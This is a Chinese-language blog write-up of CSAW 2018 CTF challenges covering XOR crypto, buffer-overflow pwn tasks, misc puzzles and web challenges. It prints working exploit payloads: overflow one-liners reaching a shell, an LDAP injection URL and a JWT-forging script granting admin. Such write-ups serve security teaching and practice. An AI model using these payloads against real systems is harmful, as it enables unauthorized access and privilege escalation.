threst's Blog

csaw 2018 wp

ctf
2018/10/04 Share

首发安全脉搏:https://www.secpulse.com/archives/75785.html

crypto

babycrypto

题目

1
2
3
4
5
6
yeeeeeeeeeeeeeeeeeeeeeeeeeeeeeet
single yeet yeeted with single yeet == 0
yeeet
what is yeet?
yeet is yeet
Yeetdate: yeeted yeet at yeet: 9:42 pm

提示single yeet yeeted with single yeet == 0
想到a XOR a == 0,可能是单字的xor加密

ciphertext

1
s5qQkd+WjN+e34+NkJiNnpKSmo3fiJeQ356Mj5aNmozfi5DfnI2anoua34+NkJiNnpKM34uXnovfl5qTj9+PmpCPk5rfm5Dfk5qMjNHft5rfiJ6Ri4zfi5Dfj4qL356Ki5CSnouWkJHfmZaNjIvT356Rm9+MnJ6Tnp2Wk5aLht+ek5CRmIyWm5rR37ea35uNmp6SjN+Qmd+e34iQjZOb34iXmo2a34uXmt+akZuTmoyM356Rm9+Ll5rflpGZlpGWi5rfnZqckJKa342anpOWi5aajN+LkN+SnpGUlpGb09+ekZvfiJeajZrfi5ea34uNiprfiZ6TiprfkJnfk5aZmt+WjN+PjZqMmo2JmpvRmZOemISblpmZlprSl5qTk5KekdKYz4+XzI2FjZ6wps61npPLnLeeuabGrKithr6uyZ63gg==

首先要将密文base64解码,再进行xor运算,脚本如下

1
2
3
4
5
6
7
8
9
10
from pwn import *
from base64 import b64decode

ciphertext = b64decode("s5qQkd+WjN+e34+NkJiNnpKSmo3fiJeQ356Mj5aNmozfi5DfnI2anoua34+NkJiNnpKM34uXnovfl5qTj9+PmpCPk5rfm5Dfk5qMjNHft5rfiJ6Ri4zfi5Dfj4qL356Ki5CSnouWkJHfmZaNjIvT356Rm9+MnJ6Tnp2Wk5aLht+ek5CRmIyWm5rR37ea35uNmp6SjN+Qmd+e34iQjZOb34iXmo2a34uXmt+akZuTmoyM356Rm9+Ll5rflpGZlpGWi5rfnZqckJKa342anpOWi5aajN+LkN+SnpGUlpGb09+ekZvfiJeajZrfi5ea34uNiprfiZ6TiprfkJnfk5aZmt+WjN+PjZqMmo2JmpvRmZOemISblpmZlprSl5qTk5KekdKYz4+XzI2FjZ6wps61npPLnLeeuabGrKithr6uyZ63gg==")


for key in range(256):
    plaintext = xor(key, ciphertext)
    if "flag{" in plaintext:
        print plaintext

flag:flag{diffie-hellman-g0ph3rzraOY1Jal4cHaFY9SWRyAQ6aH}

flatcrypt

题目

1
2
3
4
5
no logos or branding for this bug

Take your pick nc crypto.chal.csaw.io 8040 nc crypto.chal.csaw.io 8041 nc crypto.chal.csaw.io 8042 nc crypto.chal.csaw.io 8043

flag is not in flag format. flag is PROBLEM_KEY

serv-distribute.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import zlib
import os

from Crypto.Cipher import AES
from Crypto.Util import Counter

ENCRYPT_KEY = bytes.fromhex('0000000000000000000000000000000000000000000000000000000000000000')
# Determine this key.
# Character set: lowercase letters and underscore
PROBLEM_KEY = 'not_the_flag'

def encrypt(data, ctr):
    return AES.new(ENCRYPT_KEY, AES.MODE_CTR, counter=ctr).encrypt(zlib.compress(data))

while True:
    f = input("Encrypting service\n")
    if len(f) < 20:
        continue
    enc = encrypt(bytes((PROBLEM_KEY + f).encode('utf-8')), Counter.new(64, prefix=os.urandom(8)))
    print("%s%s" %(enc, chr(len(enc))))

pwn

bigboy

题目nc pwn.chal.csaw.io 9000

无论输入什么都只打印一个时间就退出了,拖进ida看看

我们要将程序将跳转到调用系统的函数才可以。

修改eax的值

nc pwn.chal.csaw.io 9000 <<< $(python -c "print 'aaaaaaaaaaaaaaaaaaaa\xee\xba\xf3\xca'")

看看有些什么

nc pwn.chal.csaw.io 9000 <<< $(python -c "print 'aaaaaaaaaaaaaaaaaaaa\xee\xba\xf3\xcals'")

有个flag.txt

nc pwn.chal.csaw.io 9000 <<< $(python -c "print 'aaaaaaaaaaaaaaaaaaaa\xee\xba\xf3\xcacat flag.txt'")

flag:flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}

get it?

题目

1
2
Do you get it?
nc pwn.chal.csaw.io 9001

无论输入什么都会重复你输入的然后退出。

objdump -d get_it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
00000000004005b6 <give_shell>:
  4005b6:   55                      push   %rbp
  4005b7:   48 89 e5                mov    %rsp,%rbp
  4005ba:   bf 84 06 40 00          mov    $0x400684,%edi
  4005bf:   e8 bc fe ff ff          callq  400480 <system@plt>
  4005c4:   90                      nop
  4005c5:   5d                      pop    %rbp
  4005c6:   c3                      retq   

00000000004005c7 <main>:
  4005c7:   55                      push   %rbp
  4005c8:   48 89 e5                mov    %rsp,%rbp
  4005cb:   48 83 ec 30             sub    $0x30,%rsp
  4005cf:   89 7d dc                mov    %edi,-0x24(%rbp)
  4005d2:   48 89 75 d0             mov    %rsi,-0x30(%rbp)
  4005d6:   bf 8e 06 40 00          mov    $0x40068e,%edi
  4005db:   e8 90 fe ff ff          callq  400470 <puts@plt>
  4005e0:   48 8d 45 e0             lea    -0x20(%rbp),%rax
  4005e4:   48 89 c7                mov    %rax,%rdi
  4005e7:   b8 00 00 00 00          mov    $0x0,%eax
  4005ec:   e8 af fe ff ff          callq  4004a0 <gets@plt>
  4005f1:   b8 00 00 00 00          mov    $0x0,%eax
  4005f6:   c9                      leaveq 
  4005f7:   c3                      retq   
  4005f8:   0f 1f 84 00 00 00 00    nopl   0x0(%rax,%rax,1)
  4005ff:   00

注意这两个函数,maingets非常可疑,再查看下give_shell函数0x400684

1
2
(gdb) x/s 0x400684
0x400684:   "/bin/bash"

这是要调用system("/bin/bash");搞事啊!!!那就来一波ida F5

1
2
3
4
5
6
7
8
9
10
11
12
13
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+10h] [rbp-20h]

  puts("Do you gets it??");
  gets(&v4);
  return 0;
}

int give_shell()
{
  return system("/bin/bash");
}

gets(char * s)接受一个参数,它将写入的内存中的位置,然后它将写入你输入的所有字符,lea指令只是做了一些数学运算。在这里表示rax = rbp - 0x20,顺便说一句,0x20 = 32,我们用A来填充获取的局部变量缓冲区。

1
2
3
4
5
6
7
8
9
10
11
12
(gdb) break *0x00000000004005f6
Breakpoint 1 at 0x4005f6
(gdb) run
Starting program: /get_it 
Do you gets it??
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, 0x00000000004005f6 in main ()
(gdb) x/6xg $rbp - 0x20
0x7fffffffde90: 0x4141414141414141  0x4141414141414141
0x7fffffffdea0: 0x4141414141414141  0x4141414141414141
0x7fffffffdeb0: 0x0000000000400600  0x00007ffff7e11b17

测试一下
python -c "print 'A' * 32 + 'B'*8 + '\xb6\x05@\x00\x00\x00\x00\x00'" > test

1
2
3
4
5
6
7
8
9
10
11
12
13
(gdb) run < test
Starting program: /get_it < test
Do you gets it??

Breakpoint 1, 0x00000000004005f6 in main ()
(gdb) x/6xg $rbp - 0x20
0x7fffffffde90: 0x4141414141414141  0x4141414141414141
0x7fffffffdea0: 0x4141414141414141  0x4141414141414141
0x7fffffffdeb0: 0x4242424242424242  0x00000000004005b6
(gdb)  nexti
0x00000000004005f7 in main ()
(gdb)  nexti
0x00000000004005b6 in give_shell ()

ok,进入give_shell

flag:flag{y0u_deF_get_itls}

misc

Short Circuit

题目

1
2
3
Start from the monkey's paw and work your way down the high voltage line, for every wire that is branches off has an element that is either on or off. Ignore the first bit. Standard flag format.

Elyk

下载图片下来

这个就是很多个LED灯连在一起,分析一下,连了地线的表示"1",其他表示"0",

最后表示

1
2
01100110 01101100 01100001 01100111 01111011 01101111 01110111 01101101 01111001
01101000 01100001 01101110 01100100 01111101

flag:flag{owmyhand}

Algebra

题目

1
2
3
Are you a real math wiz?

nc misc.chal.csaw.io 9002

就是根据他的等式来接X,题目会越来越难,写个脚本就可以解开

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
from re import *
r = remote("misc.chal.csaw.io", 9002)
r.recvuntil("*********")
r.recvline()
while True:
    task = r.recvline()
    print task
    print r.recvuntil("What does X equal?: ")
    eq1 = task.replace("=","-(")+")"
    c = eval(eq1,{"X":1j})
    result = 0
    if c.imag != 0:
        result = -c.real/c.imag
    r.sendline(str(result))
    print r.recvline()

flag:flag{y0u_s0_60od_aT_tH3_qU1cK_M4tH5}

Take an L

题目

1
2
3
Fill the grid with L's but avoid the marked spot for the W
nc misc.chal.csaw.io 9000
The origin is at (0,0) on the top left

通过google,发现了这个

使用的算法是recursiv,我们在网格的中间放置一个“L”(L-tromino),然后我们将网格分割成子网格,并为每个子网格执行相同的过程。当网格与我们的“L”(2 * 2)大小相同时,递归函数停止。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
# -*- coding:utf-8 -*-
from pwn import *
 
HOST = "misc.chal.csaw.io"
PORT = 9000

r = remote(HOST, PORT)

def send(c):
    print(c)
    r.sendline(c)


rec =  r.recvuntil("marked block: ")
print(rec)
black = eval(r.recvuntil("\n").strip())
print("Black cell: "+str(black))

n = 64 
a = [[' ' for x in range(n)] for y in range(n)] 
a[black[1]][black[0]] = "@" 


def pgrille():
    out = ""
    out += "-"*n
    out += "\n"
    for l in a:
        out += str(''.join([x for x in l]))+"\n"
    out += "-"*n
    with open("logs","a+") as fi:
        fi.write(out+"\n\n\n")


def getBlack(a,x_start,y_start,x_end,y_end):
    for j in range(y_start,y_end+1):
        for i in range(x_start,x_end+1):
            if a[j][i] == "o" or a[j][i] == "@":
                return i,j
    return None,None 


def Tile(a,x_start,y_start,x_end,y_end):
    xcenter_left = x_start+((x_end-x_start)/2)
    xcenter_right = xcenter_left+1
    ycenter_top = y_start+((y_end-y_start)/2)
    ycenter_bottom = ycenter_top+1
    xBlack,yBlack = getBlack(a,x_start,y_start,x_end,y_end)
    if xBlack <= xcenter_left: 
        if yBlack <= ycenter_top: 
            a[ycenter_top][xcenter_right] = "o"
            a[ycenter_bottom][xcenter_right] = "o"
            a[ycenter_bottom][xcenter_left] = "o"
            send("("+str(xcenter_right)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_bottom)+"),("+str(xcenter_left)+","+str(ycenter_bottom)+")")
        else:
            a[ycenter_top][xcenter_left] = "o"
            a[ycenter_top][xcenter_right] = "o"
            a[ycenter_bottom][xcenter_right] = "o"
            send("("+str(xcenter_left)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_bottom)+")")
    else: 
        if yBlack <= ycenter_top: 
            a[ycenter_top][xcenter_left] = "o"
            a[ycenter_bottom][xcenter_left] = "o"
            a[ycenter_bottom][xcenter_right] = "o"
            send("("+str(xcenter_left)+","+str(ycenter_top)+"),("+str(xcenter_left)+","+str(ycenter_bottom)+"),("+str(xcenter_right)+","+str(ycenter_bottom)+")")
        else: 
            a[ycenter_bottom][xcenter_left] = "o"
            a[ycenter_top][xcenter_left] = "o"
            a[ycenter_top][xcenter_right] = "o"
            send("("+str(xcenter_left)+","+str(ycenter_bottom)+"),("+str(xcenter_left)+","+str(ycenter_top)+"),("+str(xcenter_right)+","+str(ycenter_top)+")")
    
    pgrille() 
    if abs(x_end-x_start) > 1: 
        Tile(a,x_start,y_start,xcenter_left,ycenter_top)
        Tile(a,xcenter_right,y_start,x_end,ycenter_top)
        Tile(a,x_start,ycenter_bottom,xcenter_left,y_end)
        Tile(a,xcenter_right,ycenter_bottom,x_end,y_end)
    
Tile(a,0,0,len(a[0])-1,len(a)-1) 
r.interactive()

参考大佬代码

flag:flag{m@n_that_was_sup3r_hard_i_sh0uld_have_just_taken_the_L}

web

Ldab

题目

1
2
dab
http://web.chal.csaw.io:8080

一个简单的LDAP注入

payload:http://web.chal.csaw.io:8080/index.php/index.php?search=*)(uid=*))(|(uid=*

flag:flag{ld4p_inj3ction_i5_a_th1ng}

sso

题目

1
2
3
4
Be the admin you were always meant to be
http://web.chal.csaw.io:9000
Update chal description at: 4:38 to include solve details
Aesthetic update for chal at Sun 7:25 AM

首先查看源码

1
2
3
4
5
6
<h1>Welcome to our SINGLE SIGN ON PAGE WITH FULL OAUTH2.0!</h1>
<a href="/protected">.</a>
<!--
Wish we had an automatic GET route for /authorize... well they'll just have to POST from their own clients I guess
POST /oauth2/token
POST /oauth2/authorize form-data TODO: make a form for this route--!>

根据判断应该是基于OAuth2.0协议的身份验证,
不了解的童鞋可以看看这篇文章
https://tools.ietf.org/html/rfc6749
https://tools.ietf.org/html/rfc6750
https://blog.csdn.net/cd_xuyue/article/details/52084220

首先我要获取一个code,用burp抓包http://web.chal.csaw.io:9000/protected

/oauth2/authorizeresponse_type必须要填,而且为coderedirect_uri将传递给重定向端点的绝对URI

我们将返回一个code,我们再次修改数据包发送Access Token Request

code的参数就是刚才返回的code值,这样我们将得到一个token,这个要使用jwt解码才能看见里面的内容,

jwt解码网站https://jwt.io/

根据题目提示,我们要将type改成admin才可以

参考大佬的加密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python3
# -*- coding: utf8 -*-

import base64
import time
import hashlib
import hmac
import json
import sys

from collections import OrderedDict

def dump_tokens(jwt):
    p1, p2, p3 = jwt.split('.', 3)

    header = decode_token(p1)
    payload = decode_token(p2)

    return header, payload

def decode_token(token):
    token_len = len(token)
    padded_token = token.ljust(token_len + (token_len % 4), '=')
    dict_ = json.loads(base64.b64decode(padded_token), object_pairs_hook=OrderedDict)

    return dict_

def base64_encode(data):
    return base64.b64encode(data).decode().strip('=')

def encode_token(dict_):
    json_data = json.dumps(dict_, separators=(',', ':')).encode()
    token = base64_encode(json_data)

    return token

def sign_token(header, payload, secret):
    jwt = encode_token(header) + '.'  # header
    jwt += encode_token(payload) + '.'  # payload
    signature = base64_encode(hmac.new(secret.encode(), jwt[:-1].encode(), hashlib.sha256).digest())
    signature = signature.replace('/', '_').replace('+', '-')
    jwt += signature
    return jwt

if len(sys.argv) < 1:
    print(f'Usage {sys.argv[0]} <jwt>')
else:
    header, payload = dump_tokens(sys.argv[1])  # get original JWT as dict

    print(f'''Original JWT values:
    * header: {dict(header)}
    * payload: {dict(payload)}
''')

    new_header = header
    new_payload = payload

    # Update user type
    new_payload['type'] = 'admin'

    # Update expiration time
    unix_ts = int(time.time())
    flag_window = 600
    new_payload['iat'] = unix_ts
    new_payload['exp'] = unix_ts + flag_window

    print(f'''New JWT values:
    * header: {dict(header)}
    * payload: {dict(payload)}
''')

    # Generate new JWT (signature)
    new_jwt = sign_token(header, payload, payload['secret'])

    print(f'New signed JWT: {new_jwt}')

运行脚本

得到新的eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0eXBlIjoiYWRtaW4iLCJzZWNyZXQiOiJ1Zm91bmRtZSEiLCJpYXQiOjE1MzczMzcyNTcsImV4cCI6MTUzNzMzNzg1N30.LVpR0h6soIt3A3IRqis-T1nywLn_D_taJQhFTZdw9SE

重新发送

flag:flag{JsonWebTokensaretheeasieststorage-lessdataoptiononthemarket!theyrelyonsupersecureblockchainlevelencryptionfortheirmethods}

https://gitlab.com/mahham/ctf/blob/master/2018-csaw/Readme.md#babycrypto-50-crypto

原文作者: threst

原文链接: https://threst.github.io/2018/10/04/csaw2018wp/

发表日期: October 4th 2018, 1:34:14

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. crypto
    1. 1.1. babycrypto
    2. 1.2. flatcrypt
  2. 2. pwn
    1. 2.1. bigboy
    2. 2.2. get it?
  3. 3. misc
    1. 3.1. Short Circuit
    2. 3.2. Algebra
    3. 3.3. Take an L
  4. 4. web
    1. 4.1. Ldab
    2. 4.2. sso
Total : 42
2019
2018
瞎记罢写 ctf CVE-2017-8464 apt BadUSB netcat CVE-2017-11882 git 系统 writeup kali docker php pwn 0day 安全客弃婴 CVE-2018-8174 writeup ctf